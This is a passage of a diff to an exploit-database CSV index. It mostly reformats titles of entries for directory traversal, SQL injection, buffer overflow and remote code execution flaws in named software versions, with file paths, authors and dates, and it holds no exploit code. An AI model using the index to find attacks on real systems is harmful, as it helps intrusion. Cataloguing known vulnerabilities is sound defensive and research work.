0.723 Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"David F. Madrid",php,webapps,0 @@ -20057,7 +20055,7 @@ id,file,description,date,author,platform,type,port 22826,platforms/php/webapps/22826.txt,"VisNetic WebMail 5.8.6 .6 Information Disclosure Vulnerability",2003-06-23,posidron,php,webapps,0 22827,platforms/windows/remote/22827.txt,"Compaq Web-Based Management Agent Remote File Verification Vulnerability",2003-06-23,"Ian Vitek",windows,remote,0 22828,platforms/php/webapps/22828.txt,"WeBid <= 1.0.5 - Cross Site Scripting Vulnerabilities",2012-11-19,"Woody Hughes",php,webapps,0 -22829,platforms/php/webapps/22829.txt,"WeBid <= 1.0.5 Directory Traversal",2012-11-19,loneferret,php,webapps,80 +22829,platforms/php/webapps/22829.txt,"webid <= 1.0.5 - Directory Traversal",2012-11-19,loneferret,php,webapps,80 22830,platforms/linux/remote/22830.c,"LBreakOut2 2.x Login Remote Format String Vulnerability",2003-06-24,V9,linux,remote,0 22831,platforms/freebsd/dos/22831.pl,"Gkrellmd 2.1 Remote Buffer Overflow Vulnerability (1)",2003-06-24,dodo,freebsd,dos,0 22832,platforms/freebsd/remote/22832.pl,"Gkrellmd 2.1 Remote Buffer Overflow Vulnerability (2)",2003-06-24,dodo,freebsd,remote,0 @@ -20107,7 +20105,7 @@ id,file,description,date,author,platform,type,port 22876,platforms/hardware/dos/22876.txt,"Canon GP300 Remote Malformed HTTP Get Denial Of Service Vulnerability",2003-07-07,"DOUHINE Davy",hardware,dos,0 22877,platforms/php/webapps/22877.txt,"Yii Framework 1.1.8 Search SQL Injection Vulnerability",2012-11-21,Juno_okyo,php,webapps,0 22878,platforms/windows/dos/22878.txt,"Adobe Reader 10.1.4 JP2KLib&CoolType Crash PoC",2012-11-21,coolkaveh,windows,dos,0 -22879,platforms/windows/webapps/22879.txt,"ManageEngine ServiceDesk 8.0 Multiple Vulnerabilities",2012-11-21,Vulnerability-Lab,windows,webapps,0 +22879,platforms/windows/webapps/22879.txt,"ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities",2012-11-21,Vulnerability-Lab,windows,webapps,0 22881,platforms/php/webapps/22881.txt,"PHP Server Monitor Stored XSS",2012-11-21,loneferret,php,webapps,0 22882,platforms/windows/local/22882.c,"Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (1)",2003-07-08,Maceo,windows,local,0 22883,platforms/windows/local/22883.c,"Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (2)",2003-07-08,Maceo,windows,local,0 @@ -20161,7 +20159,7 @@ id,file,description,date,author,platform,type,port 22938,platforms/linux/dos/22938.py,"mcrypt <= 2.6.8 stack-based buffer overflow poc",2012-11-26,_ishikawa,linux,dos,0 22939,platforms/unix/local/22939.pl,"GNU GNATS 3.113 .1_6 Queue-PR Database Command Line Option Buffer Overflow Vulnerability",2003-07-21,inv[at]dtors,unix,local,0 22940,platforms/php/webapps/22940.txt,"Drupal 4.1/4.2 Cross-Site Scripting Vulnerability",2003-07-21,"Ferruh Mavituna",php,webapps,0 -22941,platforms/php/webapps/22941.txt,"AtomicBoard 0.6.2 Directory Traversal Vulnerability",2003-07-21,gr00vy,php,webapps,0 +22941,platforms/php/webapps/22941.txt,"atomicboard 0.6.2 - Directory Traversal vulnerability",2003-07-21,gr00vy,php,webapps,0 22942,platforms/php/webapps/22942.txt,"WebCalendar 0.9.x Local File Include Information Disclosure Vulnerability",2003-07-21,noconflic,php,webapps,0 22943,platforms/linux/local/22943.c,"Top 1.x/2.0 Home Environment Variable Local Buffer Overflow Vulnerability",2003-07-22,UHAGr,linux,local,0 22944,platforms/windows/remote/22944.txt,"Savant Web Server 3.1 CGITest.HTML Cross Site Scripting Vulnerability",2003-07-21,dr_insane,windows,remote,0 @@ -20191,7 +20189,7 @@ id,file,description,date,author,platform,type,port 22969,platforms/linux/remote/22969.c,"Valve Software Half-Life Server 3.1.1.0 - Multiplayer Request Buffer Overflow",2003-07-29,KnbykL,linux,remote,0 22970,platforms/windows/dos/22970.txt,"NetScreen ScreenOS 4.0.1/4.0.3 TCP Window Size Remote Denial Of Service Vulnerability",2003-07-29,"Papa loves Mambo",windows,dos,0 22971,platforms/linux/local/22971.txt,"ManDB Utility 2.3/2.4 Local Buffer Overflow Vulnerabilities",2003-07-29,V9,linux,local,0 -22972,platforms/windows/webapps/22972.txt,"Gleamtech FileVista/FileUltimate 4.6 Directory Traversal",2012-11-28,"Soroush Dalili",windows,webapps,0 +22972,platforms/windows/webapps/22972.txt,"gleamtech filevista/fileultimate 4.6 - Directory Traversal",2012-11-28,"Soroush Dalili",windows,webapps,0 22973,platforms/windows/remote/22973.rb,"Apple QuickTime 7.7.2 MIME Type Buffer Overflow",2012-11-28,metasploit,windows,remote,0 22974,platforms/unix/remote/22974.c,"wu-ftpd 2.6.2 realpath() Off-By-One Buffer Overflow Vulnerability",2003-08-02,Xpl017Elz,unix,remote,0 22975,platforms/unix/remote/22975.c,"wu-ftpd 2.6.2, 2.6.0, 2.6.1 realpath() Off-By-One Buffer Overflow Vulnerability",2003-08-06,Xpl017Elz,unix,remote,0 @@ -20249,7 +20247,7 @@ id,file,description,date,author,platform,type,port 23027,platforms/php/webapps/23027.txt,"HolaCMS 1.2.x HTMLtags.PHP Local File Include Vulnerability",2003-08-13,"Virginity Security",php,webapps,0 23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 (packages.php, id param) SQL Injection Vulnerability",2012-11-30,"Yakir Wizman",php,webapps,0 23029,platforms/php/webapps/23029.txt,"SmartCMS (index.php, menuitem param) SQL Injection & Cross Site Scripting Vulnerabilities",2012-11-30,"Yakir Wizman",php,webapps,0 -23031,platforms/php/webapps/23031.txt,"SilverStripe CMS 3.0.2 Multiple Vulnerabilities",2012-11-30,"Sense of Security",php,webapps,0 +23031,platforms/php/webapps/23031.txt,"silverstripe cms 3.0.2 - Multiple Vulnerabilities",2012-11-30,"Sense of Security",php,webapps,0 23032,platforms/asp/webapps/23032.txt,"Clickcess ChitChat.NET name XSS",2003-08-13,G00db0y,asp,webapps,0 23033,platforms/asp/webapps/23033.txt,"Clickcess ChitChat.NET topic title XSS",2003-08-13,G00db0y,asp,webapps,0 23034,platforms/windows/remote/23034.txt,"Microsoft URLScan 2.5/ RSA Security SecurID 5.0 Configuration Enumeration Weakness",2003-08-14,"Andy Davis",windows,remote,0 @@ -20286,9 +20284,9 @@ id,file,description,date,author,platform,type,port 23065,platforms/php/webapps/23065.txt,"AldWeb MiniPortail 1.9/2.x LNG Parameter Cross-Site Scripting Vulnerability",2003-08-27,"Bahaa Naamneh",php,webapps,0 23066,platforms/windows/remote/23066.pl,"Tellurian TftpdNT 1.8/2.0 Long Filename Buffer Overrun Vulnerability",2003-08-27,storm,windows,remote,0 23067,platforms/php/webapps/23067.txt,"eNdonesia 8.2/8.3 Mod Parameter Cross-Site Scripting Vulnerability",2003-08-27,"Bahaa Naamneh",php,webapps,0 -23068,platforms/windows/remote/23068.txt,"File Sharing for Net 1.5 Directory Traversal File Disclosure Vulnerability",2003-08-30,sickle,windows,remote,0 +23068,platforms/windows/remote/23068.txt,"file sharing for net 1.5 - Directory Traversal file disclosure vulnerability",2003-08-30,sickle,windows,remote,0 23069,platforms/multiple/remote/23069.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 Information Disclosure Vulnerability",2003-08-30,"Martin Eiszner",multiple,remote,0 -23070,platforms/multiple/remote/23070.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 Directory Traversal File Disclosure Vulnerability",2003-08-30,"Martin Eiszner",multiple,remote,0 +23070,platforms/multiple/remote/23070.txt,"sap internet transaction server 4620.2.0.323011 build 46b.323011 - Directory Traversal file disclosure vulnerability",2003-08-30,"Martin Eiszner",multiple,remote,0 23071,platforms/multiple/remote/23071.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 Cross Site Scripting Vulnerability",2003-08-30,"Martin Eiszner",multiple,remote,0 23072,platforms/php/webapps/23072.txt,"Ezboard 'invitefriends.php3' Cross Site Scripting Vulnerability",2003-09-01,"David F. Madrid",php,webapps,0 23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)",2012-12-02,Kingcope,windows,remote,0 @@ -20350,7 +20348,7 @@ id,file,description,date,author,platform,type,port 23131,platforms/windows/remote/23131.txt,"Microsoft Internet Explorer 6.0 Script Execution Vulnerabilities",2003-09-10,"Liu Die Yu and Jelmer",windows,remote,0 23132,platforms/windows/webapps/23132.py,"Advantech Studio 7.0 - SCADA/HMI Directory Traversal 0day",2012-12-04,Nin3,windows,webapps,0 23135,platforms/windows/remote/23135.txt,"FloosieTek FTGatePro 1.2 WebAdmin Interface Information Disclosure Weakness",2003-09-10,"Phuong Nguyen",windows,remote,0 -23136,platforms/multiple/remote/23136.txt,"FutureWave WebX Server 1.1 Directory Traversal Vulnerability",2003-09-10,dr_insane,multiple,remote,0 +23136,platforms/multiple/remote/23136.txt,"futurewave webx server 1.1 - Directory Traversal vulnerability",2003-09-10,dr_insane,multiple,remote,0 23137,platforms/multiple/remote/23137.txt,"CacheFlow CacheOS 4.1.10016 HTTP HOST Proxy Vulnerability",2003-09-10,"Tim Kennedy",multiple,remote,0 23138,platforms/linux/dos/23138.txt,"MySQL 3.23.x/4.0.x Password Handler Buffer Overflow Vulnerability",2003-09-10,"Frank DENIS",linux,dos,0 23139,platforms/windows/dos/23139.txt,"myServer 0.4.x cgi-lib.dll Remote Buffer Overflow Vulnerability",2003-09-12,Moran,windows,dos,0 @@ -20358,7 +20356,7 @@ id,file,description,date,author,platform,type,port 23141,platforms/sco/local/23141.sh,"SCO OpenServer 5.0.x 'mana' REMOTE_ADDR Authentication Bypass Vulnerability",2003-09-15,Texonet,sco,local,0 23142,platforms/multiple/dos/23142.txt,"WideChapter 3.0 HTTP Request Buffer Overflow Vulnerability",2003-09-15,"Bahaa Naamneh",multiple,dos,0 23143,platforms/sco/local/23143.sh,"SCO OpenServer 5.0.x 'mana' PATH_INFO Privilege Escalation Vulnerability",2003-09-15,Texonet,sco,local,0 -23144,platforms/windows/remote/23144.txt,"Minihttp File-Sharing for NET 1.5 Directory Traversal Vulnerability",2003-09-15,Winter-Smith,windows,remote,0 +23144,platforms/windows/remote/23144.txt,"minihttp file-sharing for net 1.5 - Directory Traversal vulnerability",2003-09-15,Winter-Smith,windows,remote,0 23145,platforms/windows/dos/23145.c,"Ipswitch Imail Server 5.0 SMTP HELO Argument Buffer Overflow Vulnerability",1998-03-10,Rootshell,windows,dos,0 23146,platforms/windows/dos/23146.c,"Alt-N MDaemon Server 2.71 SP1 SMTP HELO Argument Buffer Overflow Vulnerability",1999-03-10,Rootshell,windows,dos,0 23147,platforms/windows/remote/23147.txt,"Nokia Electronic Documentation 5.0 Directory Disclosure Vulnerability",2003-09-15,@stake,windows,remote,0 @@ -20399,7 +20397,7 @@ id,file,description,date,author,platform,type,port 23182,platforms/linux/remote/23182.c,"CFEngine 2.0.x CFServD Transaction Packet Buffer Overrun Vulnerability (1)",2003-09-25,jsk,linux,remote,0 23183,platforms/linux/remote/23183.c,"CFEngine 2.0.x CFServD Transaction Packet Buffer Overrun Vulnerability (2)",2003-11-04,snooq,linux,remote,0 23184,platforms/windows/webapps/23184.txt,"Software602 602Pro LAN SUITE 2003 Sensitive User Information Storage Vulnerability",2003-09-25,"Phuong Nguyen",windows,webapps,0 -23185,platforms/windows/remote/23185.txt,"Software602 602Pro LAN SUITE 2003 Directory Traversal Vulnerability",2003-09-25,"Phuong Nguyen",windows,remote,0 +23185,platforms/windows/remote/23185.txt,"software602 602pro lan suite 2003 - Directory Traversal vulnerability",2003-09-25,"Phuong Nguyen",windows,remote,0 23186,platforms/linux/remote/23186.txt,"MPlayer 0.9/1.0 Streaming ASX Header Parsing Buffer Overrun Vulnerability",2003-09-25,"Otero Hernan",linux,remote,0 23187,platforms/cgi/remote/23187.txt,"SBox 1.0.4 Path Disclosure Vulnerability",2003-09-25,"Julio e2fsck Cesar",cgi,remote,0 23188,platforms/linux/remote/23188.c,"Athttpd 0.4 b Remote GET Request Buffer Overrun Vulnerability",2003-09-25,r-code,linux,remote,0 @@ -20422,8 +20420,8 @@ id,file,description,date,author,platform,type,port 23205,platforms/php/webapps/23205.txt,"DCP-Portal 5.5 advertiser.php password Parameter SQL Injection",2003-10-01,"Lifo Fifo",php,webapps,0 23206,platforms/php/webapps/23206.txt,"DCP-Portal 5.5 lostpassword.php email Parameter SQL Injection",2003-10-01,"Lifo Fifo",php,webapps,0 23207,platforms/php/webapps/23207.txt,"Atrise Everyfind 5.0.2 search Cross-Site Scripting Vulnerability",2003-10-01,Ezhilan,php,webapps,0 -23208,platforms/php/webapps/23208.txt,"MPNews PRO 2.1 .0.18 Directory Traversal Information Disclosure Vulnerability",2003-10-01,"Gama Sec",php,webapps,0 -23209,platforms/windows/remote/23209.txt,"Mutant Penguin MPWeb PRO 1.1.2 Directory Traversal Vulnerability",2003-10-01,"GamaSec Security",windows,remote,0 +23208,platforms/php/webapps/23208.txt,"mpnews pro 2.1 .0.18 - Directory Traversal information disclosure vulnerability",2003-10-01,"Gama Sec",php,webapps,0 +23209,platforms/windows/remote/23209.txt,"mutant penguin mpweb pro 1.1.2 - Directory Traversal vulnerability",2003-10-01,"GamaSec Security",windows,remote,0 23210,platforms/windows/local/23210.c,"Microsoft Windows XP/2000 PostThreadMessage() Arbitrary Process Killing Vulnerability",2003-10-02,"Brett Moore",windows,local,0 23211,platforms/windows/remote/23211.cpp,"EarthStation 5 Search Service Remote File Deletion Vulnerabililty",2003-10-03,"random nut",windows,remote,0 23212,platforms/hardware/remote/23212.txt,"Cisco LEAP Password Disclosure Weakness",2003-10-03,"Cisco Security",hardware,remote,0 @@ -20448,7 +20446,7 @@ id,file,description,date,author,platform,type,port 23231,platforms/multiple/remote/23231.txt,"Medieval Total War 1.0/1.1 nickname Denial of Service Vulnerability",2003-10-07,"Luigi Auriemma",multiple,remote,0 23232,platforms/php/webapps/23232.txt,"PayPal Store Front 3.0 'index.php' Remote File Include Vulnerability",2003-10-08,"Zone-h Security Team",php,webapps,0 23233,platforms/php/webapps/23233.txt,"GeekLog 1.3.x HTML Injection Vulnerabilities",2003-10-08,Jelmer,php,webapps,0 -23234,platforms/windows/dos/23234.c,"Centrinity FirstClass 5.50/5.77/7.0/7.1 HTTP Server Long Version Field Denial Of Service Vulnerability",2003-10-08,I2S-LaB,windows,dos,0 +23234,platforms/windows/dos/23234.c,"Centrinity FirstClass 5.50/5.77/7.0/7.1 - HTTP Server Long Version Field Denial Of Service Vulnerability",2003-10-08,I2S-LaB,windows,dos,0 23235,platforms/windows/dos/23235.txt,"OpenOffice 1.0.1 Remote Access Denial Of Service Vulnerability",2003-10-08,"Marc Schoenefeld",windows,dos,0 23236,platforms/hp-ux/dos/23236.txt,"HP-UX 11 CDE DTPrintInfo Display Environment Variable Buffer Overflow Vulnerability",2003-10-08,"Davide Del Vecchio",hp-ux,dos,0 23237,platforms/php/webapps/23237.pl,"PHP-Nuke 6.6 admin.php SQL Injection Vulnerability",2003-10-08,1dt.w0lf,php,webapps,0 @@ -20467,7 +20465,7 @@ id,file,description,date,author,platform,type,port 23250,platforms/hardware/webapps/23250.txt,"Cisco DPC2420 Multiples Vulnerabilities",2012-12-09,"Facundo M. de la Cruz",hardware,webapps,0 23251,platforms/linux/local/23251.txt,"Centrify Deployment Manager 2.1.0.283 - Local Root",2012-12-09,"Larry W. Cashdollar",linux,local,0 23252,platforms/php/webapps/23252.txt,"ClipBucket 2.6 Revision 738 Multiple SQL Injection Vulnerabilities",2012-12-09,"High-Tech Bridge SA",php,webapps,0 -23253,platforms/php/webapps/23253.txt,"Achievo 1.4.5 Multiple Vulnerabilities",2012-12-09,"High-Tech Bridge SA",php,webapps,0 +23253,platforms/php/webapps/23253.txt,"achievo 1.4.5 - Multiple Vulnerabilities",2012-12-09,"High-Tech Bridge SA",php,webapps,0 23254,platforms/windows/dos/23254.txt,"TVMOBiLi 2.1.0.3557 Denial of Service Vulnerability",2012-12-09,"High-Tech Bridge SA",windows,dos,0 23255,platforms/windows/local/23255.cpp,"Microsoft ListBox/ComboBox Control User32.dll Function Buffer Overrun Vulnerability",2003-10-15,"Brett Moore",windows,local,0 23256,platforms/cfm/webapps/23256.txt,"Macromedia ColdFusion MX 6.0 SQL Error Message Cross-Site Scripting Vulnerability",2003-10-15,"Lorenzo Hernandez Garcia-Hierro",cfm,webapps,0 @@ -20493,10 +20491,10 @@ id,file,description,date,author,platform,type,port 23276,platforms/multiple/dos/23276.java,"Sun Java Virtual Machine 1.x Slash Path Security Model Circumvention Vulnerability",2003-10-22,"Last Stage of Delirium",multiple,dos,0 23279,platforms/windows/dos/23279.txt,"DIMIN Viewer 5.4.0 Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0 23280,platforms/windows/dos/23280.txt,"FreeVimager 4.1.0 Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0 -23282,platforms/multiple/remote/23282.txt,"Apache Cocoon 2.14/2.2 Directory Traversal Vulnerability",2003-10-24,"Thierry De Leeuw",multiple,remote,0 +23282,platforms/multiple/remote/23282.txt,"apache cocoon 2.14/2.2 - Directory Traversal vulnerability",2003-10-24,"Thierry De Leeuw",multiple,remote,0 23283,platforms/windows/remote/23283.txt,"Microsoft Internet Explorer 6.0 Local Resource Reference Vulnerability",2003-10-24,Mindwarper,windows,remote,0 23284,platforms/php/webapps/23284.txt,"MyBB Bank- 3 Plugin - SQL Injection",2012-12-11,Red_Hat,php,webapps,0 -23286,platforms/php/webapps/23286.txt,"Joomla JooProperty 1.13.0 Multiple Vulnerabilities",2012-12-11,D4NB4R,php,webapps,0 +23286,platforms/php/webapps/23286.txt,"Joomla JooProperty 1.13.0 - Multiple Vulnerabilities",2012-12-11,D4NB4R,php,webapps,0 23287,platforms/php/webapps/23287.txt,"MyBB Profile Blogs Plugin 1.2 - Multiple Vulnerabilities",2012-12-11,Zixem,php,webapps,0 23288,platforms/windows/dos/23288.txt,"IrfanView 4.33 IMXCF.DLL Plugin Code Execution",2012-12-11,beford,windows,dos,0 23289,platforms/php/webapps/23289.txt,"PHP Nuke 8.2.4 CSRF Vulnerability",2012-12-11,sajith,php,webapps,0 @@ -20536,7 +20534,7 @@ id,file,description,date,author,platform,type,port 23323,platforms/windows/remote/23323.py,"Novell File Reporter Agent XML Parsing Remote Code Execution Vulnerability (0day)",2012-12-12,Abysssec,windows,remote,0 23324,platforms/windows/webapps/23324.txt,"Axway Secure Transport 5.1 SP2 Path Traversal Vulnerability",2012-12-12,"Sebastian Perez",windows,webapps,0 23325,platforms/multiple/dos/23325.c,"BRS WebWeaver 1.06 httpd `User-Agent` Remote Denial of Service Vulnerability",2003-11-01,D4rkGr3y,multiple,dos,0 -23326,platforms/asp/webapps/23326.txt,"HTTP Commander 4.0 Directory Traversal Vulnerability",2003-11-01,"Zero X",asp,webapps,0 +23326,platforms/asp/webapps/23326.txt,"http commander 4.0 - Directory Traversal vulnerability",2003-11-01,"Zero X",asp,webapps,0 23327,platforms/windows/local/23327.txt,"DATEV Nutzungskontrolle 2.1/2.2 Unauthorized Access Vulnerability",2003-11-01,t4rku5,windows,local,0 23328,platforms/windows/remote/23328.py,"Nullsoft SHOUTcast 1.9.2 icy-name/icy-url Memory Corruption Vulnerability (1)",2003-11-03,airsupply,windows,remote,0 23329,platforms/windows/remote/23329.c,"Nullsoft SHOUTcast 1.9.2 icy-name/icy-url Memory Corruption Vulnerability (2)",2003-11-03,exworm,windows,remote,0 @@ -20569,16 +20567,16 @@ id,file,description,date,author,platform,type,port 23356,platforms/php/webapps/23356.txt,"Portable phpMyAdmin Wordpress Plugin Authentication Bypass",2012-12-13,"Mark Stanislav",php,webapps,0 23359,platforms/php/webapps/23359.txt,"MyBB DyMy User Agent Plugin (newreply.php) - SQL Injection Vulnerability",2012-12-13,JoinSe7en,php,webapps,0 23360,platforms/linux/remote/23360.rb,"PostgreSQL for Linux Payload Execution",2012-12-13,metasploit,linux,remote,0 -23361,platforms/hardware/dos/23361.txt,"Cisco Wireless Lan Controller 7.2.110.0 Multiple Vulnerabilities",2012-12-13,"Jacob Holcomb",hardware,dos,0 -23362,platforms/php/webapps/23362.py,"Centreon Enterprise Server 2.3.3-2.3.9-4 Blind SQL Injection Exploit",2012-12-13,modpr0be,php,webapps,0 +23361,platforms/hardware/dos/23361.txt,"Cisco Wireless Lan Controller 7.2.110.0 - Multiple Vulnerabilities",2012-12-13,"Jacob Holcomb",hardware,dos,0 +23362,platforms/php/webapps/23362.py,"Centreon Enterprise Server 2.3.3-2.3.9-4 - Blind SQL Injection Exploit",2012-12-13,modpr0be,php,webapps,0 23363,platforms/php/webapps/23363.txt,"phpBB 2.0.x Profile.PHP SQL Injection Vulnerability",2003-11-08,JOCANOR,php,webapps,0 23364,platforms/linux/local/23364.sh,"WMAPM 3.1 Privilege Escalation Vulnerability",2003-11-08,"Knud Erik Hojgaard",linux,local,0 -23365,platforms/windows/remote/23365.txt,"TelCondex SimpleWebserver 2.13.31027 build 3289 Directory Traversal Vulnerability",2003-11-10,nimber@designer.ru,windows,remote,0 +23365,platforms/windows/remote/23365.txt,"telcondex simplewebserver 2.13.31027 build 3289 - Directory Traversal vulnerability",2003-11-10,nimber@designer.ru,windows,remote,0 23366,platforms/linux/remote/23366.c,"Epic 1.0.1/1.0.x CTCP Nickname Server Message Buffer Overrun Vulnerability",2003-11-10,Li0n7,linux,remote,0 23367,platforms/cgi/webapps/23367.txt,"OnlineArts DailyDose 1.1 dose.pl Remote Command Execution Vulnerability",2003-11-10,Don_Huan,cgi,webapps,0 23368,platforms/linux/remote/23368.c,"Winace UnAce 2.2 Command Line Argument Buffer Overflow Vulnerability (1)",2003-11-10,demz,linux,remote,0 23369,platforms/linux/remote/23369.c,"Winace UnAce 2.2 Command Line Argument Buffer Overflow Vulnerability (2)",2003-11-10,Li0n7,linux,remote,0 -23370,platforms/cgi/webapps/23370.txt,"nCube Server Manager 1.0 Directory Traversal Vulnerability",2003-11-10,"Beck Mr.R",cgi,webapps,0 +23370,platforms/cgi/webapps/23370.txt,"ncube server manager 1.0 - Directory Traversal vulnerability",2003-11-10,"Beck Mr.R",cgi,webapps,0 23371,platforms/linux/remote/23371.c,"Hylafax 4.1.x HFaxD Unspecified Format String Vulnerability",2003-11-10,"Sebastian Krahmer",linux,remote,0 23372,platforms/php/webapps/23372.txt,"PHP-Coolfile 1.4 Unauthorized Administrative Access Vulnerability",2003-11-11,r00t@rsteam.ru,php,webapps,0 23373,platforms/windows/remote/23373.html,"Opera Web Browser 7.x URI Handler Directory Traversal Vulnerability",2003-11-12,S.G.Masood,windows,remote,0 @@ -20594,7 +20592,7 @@ id,file,description,date,author,platform,type,port 23384,platforms/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 $path Remote File Include Vulnerability",2003-11-17,"RusH security team",php,webapps,0 23385,platforms/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service Cross-Site Scripting Vulnerability",2003-11-17,"Ziv Kamir",multiple,remote,0 23386,platforms/php/webapps/23386.txt,"Justin Hagstrom Auto Directory Index 1.2.3 Cross-Site Scripting Vulnerability",2003-11-17,"David Sopas Ferreira",php,webapps,0 -23387,platforms/windows/remote/23387.txt,"NetServe Web Server 1.0.7 Directory Traversal Vulnerability",2003-11-17,nimber@designer.ru,windows,remote,0 +23387,platforms/windows/remote/23387.txt,"netserve web server 1.0.7 - Directory Traversal vulnerability",2003-11-17,nimber@designer.ru,windows,remote,0 23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 Information Disclosure/DOS Vulnerability",2003-11-19,3APA3A,windows,dos,0 23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 sysctl Local Denial of Service Vulnerability",2003-11-19,Anonymous,openbsd,dos,0 23390,platforms/multiple/dos/23390.txt,"EffectOffice Server 2.6 Remote Service Buffer Overflow Vulnerability",2003-11-20,D_BuG,multiple,dos,0 @@ -20628,7 +20626,7 @@ id,file,description,date,author,platform,type,port 23418,platforms/cgi/webapps/23418.pl,"Webgate WebEye Information Disclosure Vulnerability",2003-12-08,datapath,cgi,webapps,0 23419,platforms/windows/remote/23419.txt,"Abyss Web Server 1.0/1.1 Authentication Bypass Vulnerability",2003-12-08,"Luigi Auriemma",windows,remote,0 23420,platforms/php/webapps/23420.txt,"Bitfolge Snif 1.2.6 Index.PHP Path Cross-Site Scripting Vulnerability",2003-12-09,"Justin Hagstrom",php,webapps,0 -23421,platforms/cgi/webapps/23421.txt,"CalaCode @mail Webmail System 3.52 Multiple Vulnerabilities",2003-12-09,"Nick Gudov",cgi,webapps,0 +23421,platforms/cgi/webapps/23421.txt,"calacode @mail webmail system 3.52 - Multiple Vulnerabilities",2003-12-09,"Nick Gudov",cgi,webapps,0 23422,platforms/windows/remote/23422.txt,"Internet Explorer 5/6,Mozilla 1.2.1 URI Display Obfuscation Weakness (1)",2003-12-09,"Guy Crumpley",windows,remote,0 23423,platforms/windows/remote/23423.txt,"Internet Explorer 5/6,Mozilla 1.2.1 URI Display Obfuscation Weakness (2)",2003-12-09,"Zap The Dingbat",windows,remote,0 23425,platforms/php/webapps/23425.txt,"MyBB User Profile Skype ID Plugin 1.0 - Stored XSS",2012-12-16,limb0,php,webapps,0 @@ -20645,7 +20643,7 @@ id,file,description,date,author,platform,type,port 23437,platforms/windows/remote/23437.c,"DameWare Mini Remote Control Server 3.7x Pre-Authentication Buffer Overflow Vulnerability (3)",2003-12-16,kralor,windows,remote,0 23438,platforms/linux/dos/23438.pl,"X-Chat 2.0.6 Remote Denial of Service Vulnerability",2003-12-15,"Stefan Hecker",linux,dos,0 23439,platforms/multiple/remote/23439.txt,"MVDSV 0.165 b/0.171 Quake Server Download Buffer Overrun Vulnerability",2003-12-15,"Oscar Linderholm",multiple,remote,0 -23440,platforms/asp/webapps/23440.txt,"Elektropost EPIServer 3/4 Multiple Vulnerabilities",2003-12-15,babbelbubbel,asp,webapps,0 +23440,platforms/asp/webapps/23440.txt,"elektropost episerver 3/4 - Multiple Vulnerabilities",2003-12-15,babbelbubbel,asp,webapps,0 23441,platforms/linux/remote/23441.c,"Cyrus IMSP Daemon 1.x Remote Buffer Overflow Vulnerability",2003-12-15,"Carlos Barros",linux,remote,0 23442,platforms/osx/dos/23442.txt,"MacOSX 10 CD9660.Util Probe For Mounting Argument Local Buffer Overflow Vulnerability",2003-12-15,Max,osx,dos,0 23443,platforms/php/webapps/23443.txt,"Aardvark Topsites 4.1 PHP Multiple Vulnerabilities",2003-12-16,JeiAr,php,webapps,0 @@ -20666,7 +20664,7 @@ id,file,description,date,author,platform,type,port 23458,platforms/php/webapps/23458.txt,"BES-CMS 0.4/0.5 hacking.php File Include Vulnerability",2003-12-20,frog,php,webapps,0 23459,platforms/php/webapps/23459.txt,"Xoops 2.0.5 .1 MyLinks Myheader.php Cross-Site Scripting Vulnerability",2003-12-21,"Chintan Trivedi",php,webapps,0 23460,platforms/php/webapps/23460.pl,"ProjectForum 8.4.2 .1 find Request Denial of Service Vulnerability",2003-12-22,"Peter Winter-Smith",php,webapps,0 -23461,platforms/windows/remote/23461.txt,"DCAM WebCam Server Personal Web Server 8.2.5 Directory Traversal Vulnerability",2003-12-22,"Luigi Auriemma",windows,remote,0 +23461,platforms/windows/remote/23461.txt,"dcam webcam server personal web server 8.2.5 - Directory Traversal vulnerability",2003-12-22,"Luigi Auriemma",windows,remote,0 23462,platforms/php/webapps/23462.txt,"osCommerce 2.2 products_id URI Parameter SQL Injection Vulnerability",2003-12-22,JeiAr,php,webapps,0 23463,platforms/php/webapps/23463.txt,"osCommerce 2.2 manufacturers_id Parameter Cross-Site Scripting Vulnerability",2003-12-22,JeiAr,php,webapps,0 23464,platforms/windows/remote/23464.pl,"Opera 7.x Relative Path Directory Traversal File Corruption Vulnerability",2003-11-15,nesumin,windows,remote,0 @@ -20741,10 +20739,10 @@ id,file,description,date,author,platform,type,port 23538,platforms/windows/dos/23538.txt,"LionMax Software WWW File Share Pro 2.4/2.6 Remote Denial of Service Vulnerability",2004-01-12,dr_insane,windows,dos,0 23539,platforms/linux/dos/23539.txt,"Mabry Software FTPServer/X 1.0 Controls Format String Vulnerability",2004-01-12,"Jan-Olivier Fillols",linux,dos,0 23540,platforms/freebsd/dos/23540.c,"KAME Racoon ""Initial Contact"" SA Deletion Vulnerability",2004-01-14,"Thomas Walpuski",freebsd,dos,0 -23541,platforms/multiple/remote/23541.c,"LionMax Software WWW File Share Pro 2.4x Multiple Remote Vulnerabilities (1)",2004-01-14,"Luigi Auriemma",multiple,remote,0 -23542,platforms/multiple/remote/23542.c,"LionMax Software WWW File Share Pro 2.4x Multiple Remote Vulnerabilities (2)",2004-01-14,"Luigi Auriemma",multiple,remote,0 +23541,platforms/multiple/remote/23541.c,"lionmax software www file share pro 2.4x Multiple Vulnerabilities (1)",2004-01-14,"Luigi Auriemma",multiple,remote,0 +23542,platforms/multiple/remote/23542.c,"lionmax software www file share pro 2.4x Multiple Vulnerabilities (2)",2004-01-14,"Luigi Auriemma",multiple,remote,0 23543,platforms/multiple/dos/23543.txt,"Vicomsoft RapidCache Server 2.0/2.2.6 Host Argument Denial of Service Vulnerability",2004-01-15,"Peter Winter-Smith",multiple,dos,0 -23544,platforms/windows/remote/23544.txt,"Vicomsoft RapidCache Server 2.0/2.2.6 Directory Traversal Vulnerability",2004-01-15,"Peter Winter-Smith",windows,remote,0 +23544,platforms/windows/remote/23544.txt,"vicomsoft rapidcache server 2.0/2.2.6 - Directory Traversal 